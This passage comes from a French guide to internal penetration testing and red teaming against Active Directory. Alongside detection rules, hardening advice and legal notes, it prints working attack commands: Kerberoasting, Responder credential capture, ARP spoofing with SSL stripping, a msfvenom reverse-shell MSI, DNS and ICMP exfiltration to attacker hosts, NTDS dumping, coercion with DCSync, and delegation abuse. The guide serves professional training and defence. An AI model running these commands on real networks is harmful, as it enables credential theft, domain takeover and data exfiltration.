Scheduled Task persist (T1053)4698, 4702win_security_schtask_createMoyen
WMI Subscription (T1546.003)Microsoft-WMI-Activity/5861win_wmi_persistenceÉlevé
LSASS dump (T1003.001)10 (Sysmon), 4656sysmon_lsass_accessCritique
# Règle Sigma : détection Kerberoasting
title: Kerberoasting Activity
id: 18f9987f-4c3a-4c2e-9a7f-3d8b1e5f9c2d
status: stable
description: Détecte les demandes TGS-REP massives en RC4 (indicateur Kerberoasting)
references:
  - https://attack.mitre.org/techniques/T1558/003/
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'  # RC4_HMAC_MD5
    TicketOptions: '0x40810000'
  filter:
    ServiceName: '*$'             # Exclure comptes machine
  condition: selection and not filter
falsepositives:
  - Applications legacy utilisant RC4
level: high
tags:
  - attack.credential_access
  - attack.t1558.003

Microsoft Defender for Identity : alertes clés

# Configuration MDI via PowerShell (depuis le portail Defender)
# Règles de détection MDI activées par défaut :
# - Reconnaissance via LDAP
# - Skeleton Key malware
# - DCSync depuis source non-DC
# - Pass-the-Hash
# - Overpass-the-Hash
# - Kerberoasting (volume)
# - Honey Token accounts (configurer manuellement !)

# Honeypot AD : créer des comptes canaries
New-ADUser -Name "svc_honeypot" -SamAccountName "svc_honeypot" `
  -Description "SQL Service Account (LEGACY)" `
  -Enabled $true -PasswordNeverExpires $true
# Ce compte a un SPN enregistré mais n'est jamais utilisé légitimement
# Toute demande TGS pour ce compte = alerte immédiate

34. Aspects légaux et éthiques

Le pentest interne en France est encadré par un corpus légal précis. L'article 323-1 du Code Pénal punit de deux ans d'emprisonnement et 60 000 € d'amende "le fait d'accéder ou de se maintenir frauduleusement dans tout ou partie d'un système de traitement automatisé de données". La clé est l'adverbe frauduleusement : une lettre de mission signée par le représentant légal de l'organisation cible suffit à établir l'autorisation légale.

AspectCadre applicablePoint de vigilance
AutorisationCode Pénal art. 323-1Lettre de mission signée mandataire social
Données personnellesRGPD / CNILNe pas exfiltrer réellement des données DCP
PrestatairesQualification PASSI (ANSSI)Obligatoire pour OIV/OSE depuis 2023
DocumentationANSSI guide PACSTraçabilité complète des actions
Incidents découvertsObligation éthiqueNotification immédiate si compromission réelle détectée
Bug BountyProgrammes spécifiquesScope strict, paiement selon criticité
À retenir : La qualification PASSI (ANSSI) est obligatoire pour réaliser des audits de sécurité auprès des Opérateurs d'Importance Vitale (OIV) et Opérateurs de Services Essentiels (OSE) depuis la transposition NIS2 en France. Sans qualification, les contrats avec ces entités sont illégaux.

RGPD lors des tests

Le RGPD impose des contraintes spécifiques lors des tests d'intrusion. Un pentester accédant à une base de données contenant des données personnelles n'a pas le droit de les exfiltrer réellement, même avec autorisation de la mission. La preuve d'exploitation se limite à la capture d'une liste de tables ou d'un enregistrement anonymisé. Toute exfiltration réelle de données personnelles constitute une violation RGPD, même dans un cadre de pentest autorisé, et doit être notifiée à la CNIL dans les 72 heures si elle constitue une violation de données.

35. FAQ — Questions fréquentes sur le pentest interne Red Team

Quelle différence entre un pentest interne et un exercice Red Team ?

Le pentest interne est une évaluation structurée et timeboxée des vulnérabilités techniques d'un réseau interne. L'exercice Red Team est une simulation d'attaque réaliste, souvent inconnue des équipes IT/SOC, qui évalue non seulement les vulnérabilités techniques mais aussi les capacités de détection et de réponse (équipe Blue Team). Un Red Team peut durer plusieurs semaines à plusieurs mois, utilise des TTP d'APT spécifiques au profil de l'organisation, et mesure le MTTD (Mean Time to Detect) et MTTR (Mean Time to Respond).

Combien dure un pentest interne ?

La durée dépend de la taille et complexité du réseau. Pour une PME (50-200 postes, 1 domaine AD) : 5 à 8 jours. Pour une ETI (200-2000 postes, multi-sites) : 10 à 15 jours. Pour un grand compte (2000+ postes, multi-domaines, hybride Azure) : 15 à 30 jours. La qualification PASSI impose une durée minimale proportionnelle au périmètre pour garantir la couverture suffisante des vecteurs d'attaque.

Quels prérequis matériels pour un pentest interne ?

Configuration minimale recommandée en 2026 : laptop avec 32 Go RAM (les VMs Kali + analyse BloodHound consomment beaucoup), SSD NVMe 1 To, carte réseau Gigabit + adaptateur USB Ethernet de secours, adaptateur WiFi compatible injection (Alfa AWUS036ACH ou Intel AX210 en mode moniteur), câble RJ45 de 10m, et switch mini 4 ports. Optionnel mais utile : Raspberry Pi 4 préconfiguré comme implant réseau autonome pour les accès physiques.

Comment les APT utilisent-ils les mêmes techniques qu'un pentest interne ?

Les groupes APT comme FIN7 (criminel, ransomware) et Volt Typhoon (étatique, espionnage) utilisent exactement les mêmes techniques documentées dans ce guide — BloodHound pour cartographier les chemins AD, Kerberoasting pour obtenir des credentials, coercition + ADCS pour l'escalade. La différence : ils opèrent sur des mois avec une OPSEC irréprochable, là où un pentester opère sur des jours avec plus de liberté. En 2024, le rapport ANSSI sur les intrusions dans les collectivités territoriales françaises documentait l'usage systématique de Kerberoasting et de NTLM relay par des groupes criminels.

Comment évoluer du pentest vers le Red Team ?

La progression naturelle passe par : 1) Maîtrise technique complète des outils et techniques (ce guide), 2) Certifications OSCP puis CRTO (Certified Red Team Operator) ou CRTE (Certified Red Team Expert), 3) Pratique intensive sur HackTheBox Pro Labs (RastaLabs, Offshore, Cybernetics), 4) Développement de capacités de développement (C#, Go, PowerShell avancé) pour créer des outils custom, 5) Compréhension des renseignements sur les menaces (CTI) pour adapter les TTP aux profils APT. La certification OSCP d'Offensive Security reste le standard d'entrée dans la profession.

Comment se défendre contre les attaques NTLM relay ?

La défense contre les NTLM relay attacks repose sur quatre mesures complémentaires : 1) Activer SMB Signing sur tous les postes (pas seulement les DC) — la plupart des outils de relay échouent si SMB Signing est requis, 2) Activer LDAP Signing et Channel Binding sur les DC pour bloquer les relay vers LDAP/LDAPS, 3) Désactiver LLMNR et NBT-NS via GPO pour éliminer le vecteur d'empoisonnement, 4) Désactiver WebDAV et WPAD qui sont des vecteurs supplémentaires d'authentification NTLM automatique.

Quelle est la valeur du pentest interne face aux outils automatisés ?

Les scanners de vulnérabilités automatisés (Tenable, Qualys, Rapid7) identifient des CVE connues mais sont incapables de simuler les chaînes d'attaque multi-étapes exploitées par les attaquants réels. Un scanner ne fera jamais : Kerberoasting → cracking hors-ligne → mouvement latéral → ADCS ESC1 → Domain Admin → DCSync → persistence AdminSDHolder. Seul un pentester humain peut raisonner sur les combinaisons de vulnérabilités faiblement critiques qui, enchaînées, mènent à une compromission totale.

Comment documenter les preuves d'exploitation sans violer le RGPD ?

Lors de l'accès à des données personnelles, documentez uniquement le fait de l'accès et la nature des données (ex: "base de données RH contenant des enregistrements d'employés") sans capturer les données elles-mêmes. Utilisez des techniques de masquage : floutez les noms, emails, numéros de sécurité sociale dans les captures d'écran. Si vous devez prouver l'accès à une base de données, montrez uniquement la structure de la table (DESCRIBE table) et le compte de lignes (SELECT COUNT(*)) sans afficher les données réelles.

36. Kerberoasting détaillé : techniques avancées 2026

Le Kerberoasting a significativement évolué depuis sa découverte initiale. En 2026, les techniques RC4 OPSec, le Targeted Kerberoasting (modification temporaire des SPN), et l'exploitation des comptes gMSA/sMSA ouvrent de nouveaux vecteurs rarement documentés.

# Targeted Kerberoasting : ajouter temporairement un SPN à un compte cible
# Nécessite des droits d'écriture sur l'objet AD (GenericWrite, etc.)

# 1. Vérifier les droits
Get-ObjectAcl -SamAccountName "target_user" -ResolveGUIDs |
  Where-Object {$_.ActiveDirectoryRights -match "GenericWrite|WriteProperty"} |
  Select IdentityReference

# 2. Ajouter un SPN temporaire
Set-ADUser -Identity target_user -ServicePrincipalNames @{Add="fake/spn"}

# 3. Kerberoaster le compte
.\Rubeus.exe kerberoast /user:target_user /nowrap /outfile:targeted_hash.txt

# 4. Supprimer le SPN (nettoyage)
Set-ADUser -Identity target_user -ServicePrincipalNames @{Remove="fake/spn"}

# Kerberoasting via OPSEC : RC4 only, ticket par ticket, intervalles aléatoires
for ($i = 0; $i -lt $accounts.Count; $i++) {
  .\Rubeus.exe kerberoast /user:$($accounts[$i]) /rc4opsec /nowrap
  Start-Sleep -Seconds (Get-Random -Minimum 30 -Maximum 120)
}

37. Responder avancé et capture de credentials

Au-delà de la capture de hashes NTLMv2, Responder peut capturer des credentials en clair via ses serveurs HTTP, FTP, et SMTP intégrés. La configuration avancée permet de cibler des services spécifiques et d'augmenter le taux de capture dans des environnements fortement segmentés.

# Configuration Responder.conf pour maximiser les captures
# /usr/share/responder/Responder.conf
[Responder Core]
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On

# Analyse des captures en temps réel
tail -f /usr/share/responder/logs/Responder-Session.log

# Hashcat cracking optimisé pour NTLMv2 (mode 5600)
hashcat -m 5600 hashes.txt \
  /usr/share/wordlists/rockyou.txt \
  /usr/share/wordlists/weakpass_3.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  -r /usr/share/hashcat/rules/Korelogic-password.rule \
  --status --status-timer 60 \
  --potfile-path cracked.pot

Pour les techniques complètes Responder, consultez notre guide Responder : guide complet pentest Active Directory.

38. Attaques Man-in-the-Middle internes

Les attaques Man-in-the-Middle (MitM) en réseau interne permettent d'intercepter, modifier, et rejouer le trafic réseau. En 2026, ARP spoofing et IPv6 rogue router restent des techniques efficaces dans les segments non protégés.

# ARP Spoofing avec Bettercap
sudo bettercap -iface eth0

# Dans bettercap :
net.probe on
net.recon on
set arp.spoof.targets 192.168.1.0/24
arp.spoof on
net.sniff on

# Interception SSL (nécessite installer le cert bettercap sur la cible)
set https.proxy.sslstrip true
https.proxy on

Pour le guide complet MitM, consultez Bettercap et Ettercap : MitM en pentest réseau.

39. Élévation de privilèges Windows : techniques 2026

L'élévation de privilèges locale (Local Privilege Escalation — LPE) est souvent nécessaire pour passer d'un utilisateur de domaine standard à SYSTEM avant de réaliser un dump LSASS ou d'accéder à des secrets protégés. En 2026, les techniques les plus fiables combinent des misconfiguration services, des TOKEN abuse, et des exploits noyau récents.

# WinPEAS : audit automatique des vecteurs LPE
.\winPEASx64.exe

# Token impersonation avec Incognito / Rubeus
# Si un token SYSTEM ou High-Integrity est disponible en session
.\Rubeus.exe tgtdeleg  # Déléguer via token

# Service misconfiguration (SYSTEM context, writable binary path)
sc qc VulnerableService
# Si BinaryPathName est dans un dossier writable :
copy evil.exe "C:\Program Files\Vulnerable\service.exe"
sc stop VulnerableService
sc start VulnerableService  # Execute en SYSTEM

# AlwaysInstallElevated (MSI avec privilèges élevés)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Si les deux = 0x1 → LPE via MSI malveillant
msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

Pour le guide complet, consultez Élévation de privilèges Windows : techniques complètes.

À retenir : PrintSpoofer et GodPotato restent en 2026 les outils LPE les plus fiables pour passer de SERVICE/IIS APPPOOL à SYSTEM, exploitant les Impersonation Tokens disponibles dans ces contextes. Ils fonctionnent même avec les derniers patchs Windows si l'account a le droit SeImpersonatePrivilege.

40. Techniques d'exfiltration discrètes

En contexte Red Team réaliste, l'exfiltration de données (simulée) doit contourner les solutions DLP et les proxies HTTP(S) filtrants. Les canaux alternatifs — DNS, ICMP, SMB, et protocoles légitimes — offrent des méthodes d'exfiltration difficiles à détecter.

# Exfiltration via DNS (bypass DLP/proxy)
# Encoder les données en base32 et les envoyer via requêtes DNS TXT
# Outil : iodine, dnscat2

# Serveur dnscat2 (attaquant)
ruby dnscat2.rb --dns "domain=c2.attacker.com"

# Client (machine compromise)
.\dnscat2.exe --secret SECRET c2.attacker.com

# Exfiltration via HTTPS vers service cloud légitime (OneDrive, SharePoint)
# Très difficile à bloquer sans casser la productivité
# Utilisé par APT29/Cozy Bear (SUNBURST)

# Exfiltration ICMP (Ping tunnel)
ptunnel-ng -s  # Serveur
ptunnel-ng -r attacker_ip -R 22 -l 8022  # Client → SSH via ICMP

41. Simulation APT : reproduire les TTP de groupes réels

La simulation APT (Adversary Simulation) est le niveau supérieur du Red Team. Elle consiste à reproduire fidèlement les TTP documentées d'un groupe APT spécifique, sélectionné en fonction du profil de l'organisation cible.

Groupe APTAttributionSecteurs ciblesTTP signatureFramework MITRE
Volt TyphoonChine (MSS)Infrastructures critiques US/EULotL exclusif, WMI, netshG1017
FIN7Criminel (Russie)Retail, Hospitality, FinanceCarbanak, PowerShell, Cobalt StrikeG0046
Storm-0558Chine (MSS)Gouvernements, cloud MicrosoftForged tokens, AAD abuseG1036
APT29/Cozy BearRussie (SVR)Gouvernements, think tanksSUNBURST, Raindrop, WellMessG0016
SandwormRussie (GRU)Infrastructures critiques, UkraineIndustroyer, NotPetya, VPNFilterG0034
# Simulation Volt Typhoon (LotL uniquement)
# Toutes les actions via outils Windows légitimes

# Reconnaissance
netsh interface show interface
netsh advfirewall show allprofiles
wmic product get name, version
wmic computersystem get name, username, domain

# Mouvement latéral via WMI
wmic /node:"192.168.1.20" process call create "cmd.exe /c whoami > C:\Temp\out.txt"

# Collecte credentials via cmdkey (stockés Windows Credential Manager)
cmdkey /list

# Exfiltration via ntdsutil (dump AD)
ntdsutil "ac i ntds" "ifm" "create full C:\Temp\ifm" q q

42. Conclusion : vers une posture Red Team mature en 2026

Le pentest réseau interne en 2026 exige une maîtrise technique profonde combinée à une vision stratégique de la sécurité offensive. Les techniques présentées dans ce guide — de la reconnaissance BloodHound à l'exploitation ADCS, du pivoting ligolo-ng à l'évasion EDR par syscalls directs — constituent le corpus fondamental de tout Red Teamer professionnel.

Trois tendances structurent l'évolution de la discipline pour 2026-2028 : l'hybridation cloud/on-premises qui démultiplie les surfaces d'attaque et exige de maîtriser à la fois l'AD traditionnel et Entra ID ; la généralisation des EDR comportementaux qui rend les outils génériques détectables et pousse vers le développement d'outillage custom ; et enfin, la sophistication des frameworks réglementaires (DORA, NIS2, qualification PASSI) qui imposent des standards de qualité croissants aux prestataires de pentest.

La maîtrise technique sans éthique professionnelle n'a aucune valeur. Chaque technique présentée dans ce guide doit être utilisée uniquement dans un cadre légal, avec autorisation écrite, et dans le but d'améliorer la sécurité des organisations. Le Red Teamer professionnel est d'abord un partenaire de confiance qui aide les organisations à comprendre et réduire leur surface d'attaque réelle.

À retenir : La certification OSCP (Offensive Security Certified Professional) est le standard d'entrée dans la profession, complétée par le CRTO (Certified Red Team Operator) pour la spécialisation Active Directory. La pratique continue sur des environnements comme HackTheBox et GOAD reste indispensable pour maintenir les compétences face à l'évolution rapide des techniques et des défenses.

Pour approfondir vos compétences en Active Directory offensif, consultez notre guide complet Pentest Active Directory : méthodologie complète 2026 ainsi que nos articles spécialisés sur Kerberoasting, Golden Ticket, et DCSync.

43. Référentiel MITRE ATT&CK par phase de pentest interne

Phase pentestTactique MITRETechniques principalesID
Reconnaissance passiveDiscovery (TA0007)Network Service Discovery, Account DiscoveryT1046, T1087
Recon ADDiscovery (TA0007)Domain Account Discovery, Permission Group DiscoveryT1087.002, T1069.002
Poison réseauCredential Access (TA0006)Adversary-in-the-Middle, LLMNR/NBT-NS PoisoningT1557, T1557.001
NTLM RelayCredential Access (TA0006)Relay AttackT1557.001
KerberoastingCredential Access (TA0006)Steal or Forge Kerberos TicketsT1558.003
Mouvement latéralLateral Movement (TA0008)Pass the Hash, Pass the Ticket, Remote ServicesT1550.002, T1550.003, T1021
DCSyncCredential Access (TA0006)OS Credential Dumping: DCSyncT1003.006
ADCSCredential Access (TA0006)Steal or Forge Authentication CertificatesT1649
Persistance ADPersistence (TA0003)Account Manipulation, Domain Policy ModificationT1098, T1484
Évasion EDRDefense Evasion (TA0005)Process Injection, Indicator Removal, Modify Auth ProcessT1055, T1070, T1556
ExfiltrationExfiltration (TA0010)Exfiltration Over Alternative ProtocolT1048

Référence complète : MITRE ATT&CK Enterprise Matrix — mise à jour régulièrement avec les nouvelles techniques documentées par la communauté de recherche en sécurité offensive.

À retenir : Référencer les techniques MITRE ATT&CK dans votre rapport de pentest permet au client de mapper vos findings avec sa couverture défensive (SIEM, EDR) et d'identifier précisément quelles détections il lui manque. C'est une valeur ajoutée significative qui différencie un rapport expert d'un rapport générique.

44. Analyse approfondie des chemins d'attaque BloodHound

BloodHound est bien plus qu'un simple outil de visualisation — c'est un moteur de raisonnement sur les graphes d'autorisation Active Directory qui permet d'identifier des chemins d'attaque invisibles à l'œil nu. En 2026, BloodHound Community Edition (CE) apporte une refonte complète de l'interface, de nouvelles sources de données (Azure, Okta), et des capacités d'analyse améliorées. Comprendre en profondeur son fonctionnement permet d'extraire une valeur bien supérieure à la simple génération du graphe par défaut.

Le modèle de données BloodHound représente l'Active Directory comme un graphe orienté où les nœuds sont des objets AD (utilisateurs, groupes, ordinateurs, GPO, OUs, domaines) et les arêtes sont des relations de droits (edges). Chaque edge a une sémantique précise : MemberOf représente l'appartenance à un groupe, AdminTo représente l'accès administrateur local, GenericAll représente le contrôle total sur un objet, CanRDP représente le droit de connexion Bureau à distance, etc. La puissance de BloodHound réside dans sa capacité à trouver le chemin le plus court (shortestPath en langage Cypher) entre n'importe quel nœud et les groupes à privilèges.

La collecte par défaut avec le flag -c All est exhaustive mais bruyante — elle génère des milliers de requêtes LDAP et SMB qui sont immédiatement détectables par MDI. En contexte Red Team avec SOC actif, préférez une collecte progressive : d'abord -c DCOnly pour obtenir la structure AD depuis le DC via LDAP, puis -c ComputerOnly pour les sessions et les admins locaux (plus bruyant car interroge chaque machine). Cette approche segmentée permet de collecter les données essentielles en minimisant le risque de détection précoce.

À retenir : La requête BloodHound "Find Shortest Paths to Domain Admin" est la première à exécuter, mais elle n'est pas toujours la plus utile. Cherchez aussi les chemins vers "Enterprise Admins", "Schema Admins", et les comptes membres de "Protected Users" — ces groupes sont parfois des cibles intermédiaires qui facilitent l'escalade.

Requêtes Cypher avancées pour l'analyse des chemins d'attaque

# Connexion à la base Neo4j BloodHound
# Interface web : http://localhost:7474
# Credentials par défaut : neo4j / BloodHound (à changer)

# Requête 1 : Utilisateurs avec chemin vers DA via moins de 3 sauts
MATCH p=shortestPath((u:User)-[*1..3]->(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}))
WHERE NOT u.name STARTS WITH "KRBTGT"
RETURN p LIMIT 25

# Requête 2 : Ordinateurs où les utilisateurs du groupe "IT" ont des sessions actives
# et qui ont un chemin vers un DC
MATCH (u:User)-[:MemberOf]->(g:Group {name:"IT@DOMAIN.LOCAL"})
MATCH (u)-[:HasSession]->(c:Computer)
MATCH p=shortestPath((c)-[*1..]->(d:Domain))
RETURN p

# Requête 3 : Tous les comptes avec DCSync rights
MATCH (u)-[:GetChanges|GetChangesAll]->(d:Domain)
RETURN u.name, u.enabled, u.lastlogontimestamp, d.name
ORDER BY u.lastlogontimestamp DESC

# Requête 4 : Comptes Kerberoastables avec mots de passe anciens (>1 an)
MATCH (u:User {hasspn:true})
WHERE u.pwdlastset < (datetime().epochSeconds - 365*24*3600)
AND u.enabled = true
RETURN u.name, u.pwdlastset, u.serviceprincipalnames
ORDER BY u.pwdlastset ASC

# Requête 5 : Délégations Kerberos non contraintes (Unconstrained Delegation)
MATCH (c:Computer {unconstraineddelegation:true})
WHERE NOT c.name STARTS WITH "DC"
RETURN c.name, c.operatingsystem, c.enabled

# Requête 6 : Utilisateurs avec droits WriteOwner/WriteDacl sur d'autres utilisateurs
MATCH (u1:User)-[:WriteOwner|WriteDacl|GenericWrite]->(u2:User)
RETURN u1.name AS attacker, u2.name AS target, u2.admincount

La délégation Kerberos : un vecteur d'attaque systématiquement sous-estimé

La délégation Kerberos permet à un service de s'authentifier auprès d'autres services au nom d'un utilisateur. Cette fonctionnalité légitime est régulièrement mal configurée, créant des vecteurs d'escalade critique. Il existe trois types de délégation, avec des risques très différents.

La délégation non contrainte (Unconstrained Delegation) est la plus dangereuse : le service peut s'authentifier auprès de n'importe quel service du domaine au nom de l'utilisateur. Lorsqu'un utilisateur s'authentifie auprès d'un service avec délégation non contrainte, son TGT complet est placé en mémoire sur ce serveur — un attaquant qui compromet ce serveur obtient ces TGT et peut les utiliser librement. Combinée à la coercition (forcer un DC à s'authentifier vers le serveur compromis), cette technique permet d'obtenir un TGT de DC machine et d'effectuer un DCSync.

La délégation contrainte (Constrained Delegation) limite l'accès aux services spécifiquement autorisés — mais elle reste exploitable via S4U2Self/S4U2Proxy pour impersonner n'importe quel utilisateur vers le service cible. La délégation contrainte basée sur les ressources (Resource-Based Constrained Delegation — RBCD) est la plus moderne et la moins risquée, mais son abus via des droits d'écriture sur l'objet AD cible est un vecteur d'escalade très efficace en 2026.

# Exploitation de la délégation non contrainte
# 1. Identifier les serveurs avec unconstrained delegation
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation |
  Select-Object Name, TrustedForDelegation

# 2. Sur le serveur compromis : surveiller les TGT entrants (Rubeus monitor)
.\Rubeus.exe monitor /interval:5 /nowrap

# 3. Déclencher une coercition depuis le DC
python3 printerbug.py domain.local/user:Password123@dc01.domain.local COMPROMISED_SERVER_IP

# 4. Le TGT du DC arrive dans Rubeus monitor - le récupérer
.\Rubeus.exe ptt /ticket:BASE64_TGT_DC

# 5. DCSync avec le ticket DC$
.\Mimikatz.exe "lsadump::dcsync /domain:domain.local /user:Administrator" exit

# Exploitation RBCD
# Si l'attaquant a des droits GenericWrite sur un objet machine :
# 1. Créer un compte machine attaquant
New-MachineAccount -MachineAccount AttackerPC -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force)

# 2. Configurer RBCD : autoriser AttackerPC$ à déléguer vers la cible
Set-ADComputer -Identity TARGET_PC -PrincipalsAllowedToDelegateToAccount AttackerPC$

# 3. Obtenir un ticket de service pour Administrator sur la cible
.\Rubeus.exe s4u /user:AttackerPC$ /rc4:ATTACKER_HASH /impersonateuser:Administrator /msdsspn:cifs/TARGET_PC /ptt
À retenir : La délégation Kerberos non contrainte sur des serveurs non-DC est une vulnérabilité critique qui permet d'obtenir Domain Admin en une seule étape via coercition. BloodHound identifie ces machines avec la requête "Find Computers with Unconstrained Delegation". Toute machine avec cette configuration doit être traitée comme équivalente à un DC du point de vue de la sécurité.

45. Protocoles propriétaires Microsoft et leurs vulnérabilités

Le réseau Windows d'entreprise repose sur une dizaine de protocoles propriétaires Microsoft dont la compréhension approfondie est indispensable pour le Red Teamer. Chacun présente des particularités qui peuvent être exploitées dans des contextes spécifiques.

MS-RPC : le socle de l'exploitation Windows

MS-RPC (Microsoft Remote Procedure Call) est le protocole de communication fondamental de Windows, utilisé par SMB, DCOM, WMI, Kerberos, LDAP et une multitude de services. Comprendre MS-RPC permet de comprendre pourquoi de nombreuses techniques d'attaque fonctionnent de manière semi-permanente : les interfaces RPC exposent des fonctionnalités qui ne peuvent pas être simplement patchées sans casser des fonctionnalités Windows essentielles. C'est précisément pourquoi PrinterBug (MS-RPRN) et DFSCoerce (MS-DFSNM) ne seront probablement jamais patchés — désactiver ces interfaces RPC casserait l'impression réseau et la réplication DFS.

L'outil impacket expose une interface Python complète pour interagir avec les interfaces RPC Windows. En 2026, les modules les plus utilisés en pentest interne sont : rpcdump.py pour énumérer les interfaces RPC exposées, samrdump.py pour énumérer les utilisateurs via MS-SAMR, lookupsid.py pour résoudre les SID, et getPac.py pour analyser les Privilege Attribute Certificates Kerberos.

# Énumération des interfaces RPC exposées
rpcdump.py 192.168.1.10 | grep -E "MS-|ncacn"

# Énumération SAMR (utilisateurs, groupes)
samrdump.py domain.local/user:Password123@192.168.1.10

# Résolution de SID en nom
lookupsid.py domain.local/user:Password123@192.168.1.10 1000

# Brute force SID (trouver tous les utilisateurs/groupes)
lookupsid.py domain.local/user:Password123@192.168.1.10 5000 | grep -E "User:|Group:"

# Test des interfaces de coercition via rpcdump
rpcdump.py 192.168.1.10 | grep -i "efsr\|spoolss\|fsrvp\|netdfs"

SMB : bien plus qu'un partage de fichiers

Le protocole SMB (Server Message Block) est en 2026 toujours au cœur des attaques réseau Windows. SMBv3.1.1 (Windows 10/Server 2019+) apporte le chiffrement des connexions et la compression, mais SMBv1 — toujours présent dans de nombreux environnements legacy — reste une vulnérabilité majeure. La compromission de SMB Signing (désactivé par défaut sur les postes clients) est l'un des premiers vecteurs à vérifier en pentest interne.

# Vérification SMB Signing sur l'ensemble du réseau
nxc smb 192.168.1.0/24 --gen-relay-list targets_no_signing.txt
# Génère automatiquement la liste des machines sans SMB Signing

# Test SMBv1 (critiqué mais encore présent)
nxc smb 192.168.1.0/24 --shares --smb-timeout 5 | grep -i "smbv1\|SMBv1"

# Énumération des politiques de mot de passe via SMB
nxc smb dc01.domain.local -u user -p Password123 --pass-pol

# Enum des utilisateurs via SMB RID cycling (sans auth si RID null session)
nxc smb 192.168.1.10 -u '' -p '' --rid-brute

46. Forensics défensif et traces laissées par le pentester

Un pentester professionnel doit comprendre les traces qu'il laisse dans les logs Windows, dans l'Active Directory, et sur le réseau. Cette connaissance sert deux objectifs complémentaires : améliorer son OPSEC pour éviter la détection pendant la mission, et documenter précisément ses actions dans le rapport pour faciliter la corrélation côté défense.

Logs Windows générés par les techniques de pentest

TechniqueJournal WindowsEvent IDInformation enregistrée
Connexion SMBSecurity4624 (Type 3)IP source, compte, hostname
Connexion RDPSecurity4624 (Type 10)IP source, compte
WinRM/PSRemotingSecurity4624 (Type 3) + PowerShellIP, script exécuté
Création service (psexec)System7045Nom service, chemin binaire
KerberoastingSecurity4769Compte demandeur, SPN, chiffrement
Scheduled Task créationSecurity4698Nom tâche, commande, compte
DCSync (DS-Replication)Security4662IP source, attributs répliqués
BloodHound (LDAP)Directory Service1644Requêtes LDAP coûteuses
Net commandsSecurity4688Process name, command line
Mimikatz (LSASS access)Security4656 + Sysmon 10Process accédant LSASS
# Consultation des logs DCSync depuis un DC
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4662] and EventData[Data[@Name='Properties'] and (Data='1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' or Data='1131f6ab-9c07-11d1-f79f-00c04fc2dcd2')]]" |
  Select-Object TimeCreated, @{N='SubjectAccount';E={$_.Properties[1].Value}}, @{N='ObjectDN';E={$_.Properties[6].Value}}

# Analyse logs Kerberoasting
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4769] and EventData[Data[@Name='TicketEncryptionType']='0x17']]" |
  Select-Object TimeCreated, @{N='Account';E={$_.Properties[0].Value}}, @{N='ServiceName';E={$_.Properties[2].Value}}, @{N='ClientAddress';E={$_.Properties[6].Value}}
À retenir : Sysmon (System Monitor de Sysinternals) est l'outil de logging Windows le plus puissant pour la détection d'attaques offensives. Les Event ID Sysmon 1 (process creation avec command line), 3 (network connections), 8 (remote thread creation), 10 (process access) et 25 (process tampering) couvrent la quasi-totalité des techniques de pentest interne. Recommandez systématiquement son déploiement dans vos rapports.

47. Hardening Active Directory : recommandations post-pentest

Un rapport de pentest interne de qualité ne liste pas seulement les vulnérabilités — il fournit un plan de remédiation concret et priorisé. En 2026, les 10 mesures de hardening AD les plus impactantes sont connues, documentées, mais rarement toutes implémentées simultanément par manque de ressources ou de compréhension des risques réels.

MesureImpact sécuritéComplexité déploiementDélai recommandéRéf ANSSI
Tier Model (AD Tiering)CritiqueÉlevée3-6 moisGuide ANSSI PA-022
Protected Users groupÉlevéFaibleImmédiatMS Security Blog
Désactiver LLMNR/NBT-NSÉlevéFaible (GPO)ImmédiatCIS Benchmark
SMB Signing requisCritiqueFaible (GPO)1 semaineANSSI R32
Credential GuardCritiqueMoyen1 moisMS Docs
LAPS (Local Admin Password)ÉlevéMoyen1-2 moisMS LAPS Guide
gMSA pour comptes serviceÉlevéMoyen2-3 moisMS gMSA Guide
Audit ADCS (Certipy)CritiqueFaibleImmédiatSpecterOps
MDI déploiementÉlevéMoyen1-2 moisMS MDI Guide
Désactiver Print Spooler DCsÉlevéFaibleImmédiatMS Advisory

Le modèle Tiering Active Directory

Le modèle Tiering AD (ou modèle à trois niveaux) est la recommandation fondamentale de Microsoft et de l'ANSSI pour sécuriser un Active Directory. Il divise l'infrastructure en trois niveaux d'isolation stricte : Tier 0 (contrôleurs de domaine, infrastructure AD, serveurs ADCS), Tier 1 (serveurs applicatifs, infrastructure IT), et Tier 2 (postes de travail utilisateurs). Chaque compte n'a d'accès qu'aux machines de son niveau — un compte Tier 2 ne peut jamais s'authentifier sur un Tier 0 ou Tier 1, même en cas de compromission.

En pratique, l'implémentation du Tiering repose sur des Authentication Policies (Windows Server 2012R2+) qui limitent les comptes privilégiés à des hôtes spécifiques, des GPO qui bloquent la connexion de comptes non-Tier sur les machines des autres Tiers, et des comptes dédiés par niveau (un administrateur a trois comptes : un compte Tier 0 pour les DC, un compte Tier 1 pour les serveurs, un compte Tier 2 pour son usage quotidien). Le Tiering est le principal obstacle à la propagation latérale en réseau Windows — sa mise en place rend le mouvement latéral significativement plus difficile même avec des credentials compromis.

À retenir : Un environnement AD correctement tierisé transforme radicalement le profil de risque. Un compte Tier 2 compromis (credential utilisateur standard) ne donne plus accès aux serveurs ni aux DC. Le Kerberoasting d'un compte de service Tier 1 ne permet plus d'atteindre directement les DC. L'implémentation du Tiering est la recommandation la plus impactante que vous puissiez formuler dans un rapport de pentest interne.

48. NTLM vs Kerberos : comprendre les protocoles pour mieux les exploiter

La maîtrise des protocoles d'authentification Windows est indispensable pour comprendre pourquoi certaines attaques fonctionnent et d'autres non selon le contexte. NTLM et Kerberos coexistent dans tous les environnements Windows modernes, chacun avec ses forces et faiblesses du point de vue offensif.

NTLM : le protocole legacy incontournable

